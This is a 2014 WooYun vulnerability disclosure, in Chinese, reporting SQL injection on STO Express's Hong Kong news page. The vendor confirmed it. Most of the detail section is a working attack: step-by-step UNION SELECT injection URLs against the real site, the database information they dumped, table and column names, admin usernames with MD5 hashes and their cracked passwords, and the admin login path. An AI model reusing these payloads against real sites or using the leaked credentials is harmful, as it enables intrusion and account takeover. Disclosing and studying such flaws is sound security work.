漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2014-061498
漏洞标题:STO香港分站存在SQL漏洞
相关厂商:申通快递
漏洞作者: www
提交时间:2014-05-29 15:45
修复时间:2014-07-13 15:45
公开时间:2014-07-13 15:45
漏洞类型:SQL注射漏洞
危害等级:中
自评Rank:6
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2014-05-29: 细节已通知厂商并且等待厂商处理中
2014-05-29: 厂商已经确认,细节仅向厂商公开
2014-06-08: 细节向核心白帽子及相关领域专家公开
2014-06-18: 细节向普通白帽子公开
2014-06-28: 细节向实习白帽子公开
2014-07-13: 细节向公众公开
简要描述:
STO香港分站存在SQL漏洞。
详细说明:
www.sto-express.com.hk/en/news/news_detail.php?id=243+and+1=2+union+select+1,2,3,4,5,concat(),7--
http://www.sto-express.com.hk/en/news/news_detail.php?id=243+and+1=2+union+select+1,2,3,4,5,concat%28user%28%29,0x20,database%28%29,0x20,version%28%29%29,7--
看下信息
ivansto@localhost
landmark2hk_sto
5.5.32-percona-sure1-log
爆表
http://www.sto-express.com.hk/en/news/news_detail.php?id=243+and+1=2+union+select+1,2,3,4,5,hex%28group_concat%28distinct+table_name%29%29,7+from+information_schema.tables+where+table_schema=database%28%29--
news,photo,promo,tblAdmin,tblSession,tblStyle,tblTasks
tblAdmin管理表
爆列
http://www.sto-express.com.hk/en/news/news_detail.php?id=243+and+1=2+union+select+1,2,3,4,5,hex%28group_concat%28distinct+column_name%29%29,7+from+information_schema.columns+where+table_name=0x74626c41646d696e--
恩出来了
id,Login,Pwd,Name,Tel,Email,Section,Remark,ChatRoom,DELETE_MARK,Status
看下数据,Login,Pwd,够了吧
www.sto-express.com.hk/en/news/news_detail.php?id=243+and+1=2+union+select+1,2,3,4,5,hex(group_concat(Login,0x20,Pwd)),7+from+tblAdmin--
数据出来了
test dacf8fac759fd2a163f7cd973414be8b,
Result: 001835 >>>Good Luck !<<<
stoexpress 8ddcff3a80f4189ca1c9d4d902c3c909
Result: 88888888 >>>Good Luck !<<<
后台吧
http://www.sto-express.com.hk/admin/login/
漏洞证明:
修复方案:
过滤,还有口令复杂度
版权声明:转载请注明来源 www@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:10
确认时间:2014-05-29 16:40
厂商回复:
谢谢
最新状态:
暂无